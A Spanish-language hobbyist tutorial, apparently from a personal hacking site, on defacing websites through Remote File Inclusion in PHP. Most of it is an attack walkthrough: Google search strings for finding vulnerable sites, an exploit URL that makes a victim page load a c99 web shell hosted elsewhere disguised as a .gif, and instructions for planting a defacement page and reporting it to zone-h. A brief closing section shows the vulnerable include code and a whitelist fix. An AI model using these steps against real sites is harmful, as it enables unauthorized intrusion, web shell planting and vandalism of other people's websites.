Hola atodos hoy les dejare un tutorial de Como hacer un daface con RFI...

comenzemos...

Como hackear una web por RFI by Zero

***********
RFI
***********

Buenas, soy Zero y hago este tutorial por que mi anterior tutorial (Como hacer un deface by Zero) solo era para saber de que iba la cosa ahora en este profundizare un poco mas en el tema del RFI, espero que os guste y si teneis cualquier duda o sugerencia solo teneis q ir a la seccion contactar de mi web (www.zerooo.es), a ver que os parece.

1- Que es RFI?
2- Que es una SHELL?
3- Como encontrar una web vulnerable?
4- Como explotar la vulnerabilidad?
5- Dejando nuesra marca
6- Como evitar que nos lo hagan a nosotros

***************
Que es RFI?
***************

RFI (Remote File Inclusion) es una vulnerabilidad que solamente existe en paginas dinamicas como php que permite enlazar archivos que estan en servidores remotos, esta vulnerabilidad se produce por una mala programacion del webmaster usando la funcion include()
Una web vulnerable podria ser:
www.victima.com/index.php?page=videos.php
Esta pagina lo que esta haciendo es incluir el documento "videos.php".
Nos aprovecharemos de esto incluyendo nuestros propios archivos pero para eso necesitamos una shell.



*********************
Que es una shell?
*********************

Una shell es un interrete de ordenes y comandos. Es una interfaz para comunicar el usuario con el sistema operativo.
Esto para que nos sirve en nuestro deface pensaras? Pues esta claro! Con esto ejecutaremos comandos en la web victima.

**********************************
Como encontrar una web vulnerable?
**********************************

Como encontrar una web vulnerable? Pues con google!
Podemos encontrarlas haciendo busquedas del tipo:
allinurl:index.php?page= .php
y variantes, en vez de page otra cosa similar como: go, pg, ir, ...

************************************
Como explotar la vulnerabilidad?
************************************

Vamos a ver como explotar la vulnerabilidad, tenemos la web
www.victima.com/index.php?page=videos.php
para comprobar que es vulnerable vamos a poner:
page=http://www.zerooo.es (no olvides el http que es muy importante!)
y quedaria algo como...
www.victima.com/index.php?page=http://www.zerooo.es
si ves que nuestra bonita web se carga dentro de esa web, enhorabuena! aunque no siempre esta asegurado el deface...
ahora vamos a meter nuestra shell ahi, hay muchos tipos de shell, yo recomiendo la c99 ya que es muy facil de usar, asi que la descargamos de esta misma web
y si no esta en .gif la ponemos como .gif ya que si estuviera .php se ejecutaria en nuestro servidor.
Ahora la subimos a un hosting gratuito mismo como iespana por ejemplo y vamos a nuestra victima y escribimos donde estaba zerooo la direccion de la shell por ejemplo:
www.victima.com/index.php?page=http://tuweb.com/c99.gif? (Ojo con el ? que a veces es importante)
ahora si todo a salido bien deberia abrirse la shell y ahi veriamos lo que podemos hacer, yo recomiendo NO BORRAR NADA pro bueno yo no voy a decir lo que debeis o no debeis hacer

*************************
Dejando nuestra marca
*************************

Ahora que tenemos control sobre la web mediante la shell vamos a dejar claro que hemos estado aqui, este es un tema dificil de explicar ya que siempre estara esa gente que borra todo y tambien esos que solo le mandan un mail al admin yo estoy en medio asi que os explicare un poquillo... Yo recomiendo subir nuestro index.html en el que ponga quien a echo el deface pero sin borrar el otro index, si es php el otro el nuestro por ser html tiene preferencia y si no
le cambiamos el nombre al otro y ya esta.
Recomiendo poner una fotito bien bonita con un OWNED bien grande jaja
y bueno ahora solo faltaria (si queremos) ir a zone-h y notificar nuestro deface.

****************************************
Como evitar que nos lo hagan a nosotros
****************************************


Como ya he dicho los bugs RFI son por culpa del programador asi que para evitarlos simplemente seria en el codigo no dejar que la gente haga lo que quiere por ejemplo.
Ejemplo de web vulnerable www.victima.com/index.php?page=zerooo.php:

<?

include($page);

?>

Y ese codigo lo que hace es incluir $page que seria igual a zerooo.php y para evitarlo podriamos utilizar un if o un switch por ejemplo.

<?

if ($page == "zerooo"){

include ("zerooo.php");

}

?>

Con ese codigo nos evitamos la inclusion de archivos no deseados ya que solo incluira el archivo si es igual a la variable.


Espero que os haya gustado el tutorial y para cualquier cosa: www.zerooo.es si teneis alguna duda o algo podeis mandarme un mail dandole a la seccion contacto

ojala les ayude

SaludOs